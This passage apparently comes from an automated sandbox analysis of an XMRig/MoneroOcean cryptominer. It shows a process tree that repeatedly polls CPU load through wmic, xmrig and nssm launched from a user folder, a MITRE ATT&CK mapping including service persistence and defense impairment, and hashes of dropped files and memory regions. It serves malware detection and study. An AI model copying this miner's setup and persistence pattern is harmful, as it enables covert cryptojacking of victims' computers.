- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2220
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1184
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4160
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1304
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4824
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2952

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:820
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
267fb8d1c4ab8cd7650d7e4ab68229f1

SHA1
a0117292227f1452723d410ebb87721493d7ffd1

SHA256
62c50c45ce938aae69e5f820fec251bc94845e5521cad6757a0efc4594bf40bb

SHA512
162e5d5b5c93083a3eb9e0a5cd2234f747562f629bca17fec415e9edbd9b0de9a53b51b16bf0f5a96bf41ddbef14f6bd6864df34a04e637ea45fa2099a4e58ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
397c6ad4b39ca40f2e332d9dd36fd610

SHA1
d299776f42f8da31bffe27e90d9b939b3d88c912

SHA256
d71a7f8e58e9442e8fcba42aa71f42f05fc144e8fabd7b447c6e95401e6d0690

SHA512
4c54714fb72c666be283a32deefe8de1b1d03daed638dcec5887399540c38860c6867a1625107979e2e929cd8c685ad97ec9ae9359407a08b3e18296265e211e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c3f0a49a440bc471b44184b9147bfe8f

SHA1
5b3899ab06196b03946437b729007f2f7d53778c

SHA256
7c383239bae0131e64cf2c536adcdc24b07d51918bd57230ec7f1b07d4afe0c2

SHA512
321e72198da1de40434a1094f160cb0614fe892becef3744fa72a545199f43f93dd03ec0da2e8e3c8cd0c5e978a5d3783c53d8ac7f4a89e90afa14c4e36887f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
979e681ea7e16bc9271d84e1fec724da

SHA1
34fb82bde944835e86cba05822b69b0c0fd9a51c

SHA256
998a6cc54505c26b44ac78ce1ca985ea59c80d13910abe4b876d0801534780c8

SHA512
84ab7790424056e204854df7c73db5a779b50be4e2c94926171c603accfb2992f425708404d643ef5fc33973b446ae40c3ecd57c31f9c12b1e07fd2cd7a9f872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c74cc00ce95e7d7593b17269b6930649

SHA1
ea39b5cf100737c59ec56537f625f7d8cffbfbbf

SHA256
5136b828f357014686789f2b835d8c5dc5e6172a92f4027337810698c66e7eff

SHA512
de11646c97060dfb087c80e66070200f316b62b1af2d9cb7fece8a13ec7213cdf2a60ec7514de291ecf65c455a44d16b8bc9293cc3f7b55a90c71b594b8645f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2695755bb277943c49e4c35b43918e0a

SHA1
3255675933a10cbfe7daba521a9a7539060c6d02

SHA256
c075ef6a80cf822654639dd0f8c7146f96f537dbda560f0f7f85ac685e0e2623

SHA512
addd542538cff4c832ada15ac9661402e8ed8a7e3dfd9ba5e70f68c56b9bdb0e40c971c105fc7595a3ef6dd7f7fb4855395d22567cdd269f69e4ed88040410af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
380c2048fbd6ffe7e7d91bd4cb9705f0

SHA1
4fa5b6e5caa3161f1cc9800092d983a115fda300

SHA256
673fe122685cb73523153e15ef4960cf36fc3f01833346e1e8abbad2d4e535af

SHA512
9886675afd1614019c1d3144845aafb173705b57e2cce00da0e15c08a910d923ee4ed10e73ae99f2c2a40e1b57a7994fb1bf9cfcea0600129b256ae64027e765

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fb1c7151ed51131c2445397faf0328a5

SHA1
9b57f31507902114742d4d205d457b3a3f542570

SHA256
dcef458af72284122086ba4e2baf00919eec26463b46a382844de4c2b385688e

SHA512
85a67d7a352fd8b9a6d6d48d95cf61b8ee07817d468066d3e5655a6aa2c0d5918d9a5ba278a9fb3c322d59bdabb4abf70da73c8186bba5f9158436af5cb46b6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f760cd51ada41d74006c303e02a1733c

SHA1
85a2b39705fdc0dc7cfcc042af0cc2bde0f3372e

SHA256
b846130737712dc0f47215ddad36ee6b047583e1690e9f7abbe67e2e4108b330

SHA512
6ef0feeeb1c0c23aa66488439e80aee56ede239e4ca01394aef8013015880bc90bf202416339c1be0a71e6a278eb534bb4ffefa365bae13ed42b1e1f87663f39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a37949497a62d801d973d82e6615a3d

SHA1
708ae2d17f71aca29e445b8715ab7f4093b6ad5a

SHA256
e00b37ae6d7a3564ba7b2e5d7e45e257d0ca0ef9837d9e53f60b5df448fd7a6f

SHA512
5f1e214ccf998f631e1fe050952a3a7af4825558a036b6f129b7a496f09c24b0adb8166bd8b1dd616eb290257de685112500e4aa253fab89fda1e9b48665ec5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e4ec6e9ae4792ee218bcd8e7c7796861

SHA1
aee0289ddbde42f5ed0a4ce1f6338c06da42f5c6

SHA256
761d2e99e85db5d50bf83337cfb26a6bcdadfbca0eab3450c9b66e7992e12c50

SHA512
c9aaf094a7f1b5115078e0065d2136ee51f30418ebbf87b6741aa715ea8d66f83716822f5cf2a8a5ead05c9f0ea506766a77edd0f174cbb5af6c3b26b765a5f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a08aea3dde34041454796e3c1ad76082

SHA1
40f1cd00c84c2ec0d2cc13609fd0cf33aea99194

SHA256
68ba6c03fdb31a6472d3280700262fb84d07ce188d3ee5a0621b4a2911466778

SHA512
6d917026a685bad8322a8d05b5cb8256aad32c887a833a387e23ed7d0d9f6f99691d0c42c32843c7454e340390f90fef2962e9b1bb7583e888b2e5fd38ffdcbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ciqmiud5.diu.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7D0F.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e3b9b22db047eeacf220bc3b9c7f4eb2

SHA1
3b32a79bfde5b7860537e969a65c9ce854794efb

SHA256
5ef97aec367578d4ef6954f09f3ad4db6bb92d74dd08db7452c9e7bda32327d4

SHA512
0f9f534bcf09077b826fee22bfcdb24cdef734ab10f903687107b28b28c2e45cfa72655ae5716561a4b2aade574595a373f27df380792aa7bec3281056ab7d27

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
31ed789a202464014b0fbf4039772fb0

SHA1
cb75eaad1ce624384ddf70892620059864932213

SHA256
929598a3e63cef5075912d689cc6a3763e67f081d4b391777291f0b16a0715a2

SHA512
28aacb9d4eee50ae65873d8a82f949aae76b6b4f00c31af748b5b157f09b3683384f1f6ae00fa932580b93d5d9fbf98fecf192e9d2b8793caacc7db09858e2d5

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d52562e26122d42cc556c8608a43bad7

SHA1
6f3e9fc3b44900f06ee66f5b1d65980e8513be9d

SHA256
4b0170591ebd2a839d83d503fee7615814bffbbcb17f05573076932b4ac324bf

SHA512
1778980a60c7a31eb96176ad2cc3f5848807454eab53cc45de2a65324191e5eaf2c58944096acf2f4da095becbed18c8e58293defbd205360acb98be4acbfaee

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
576a5acbfaaafb17dc3a121678eba919

SHA1
316d7b5c2363270521a929a5efafee566a7f9fbb

SHA256
6c6588695545807801b19eb67cfef5dce6308165669c6cceb34cd54ba4541fe8

SHA512
edf57b705b190a4758527f5410e24bcbb7e75e04e770ea2b9bab3a5b5d006f4b3d5ed39597ff125e971e3715be33fbfd65057fac4c3f526d3b66fe6d7de84c4f

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/660-133-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/660-132-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/2296-425-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-439-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-476-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-475-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-474-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-473-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-472-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-471-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-470-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-469-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-468-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-415-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-416-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-417-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-418-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-419-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-420-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-421-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-422-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-423-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-424-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-467-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-426-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-427-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-428-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-429-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-430-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-431-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-432-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-433-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-434-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-435-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-436-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-437-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-438-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-466-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-440-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-441-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-442-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-443-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-444-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-445-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-446-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-447-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-448-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2296-449-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
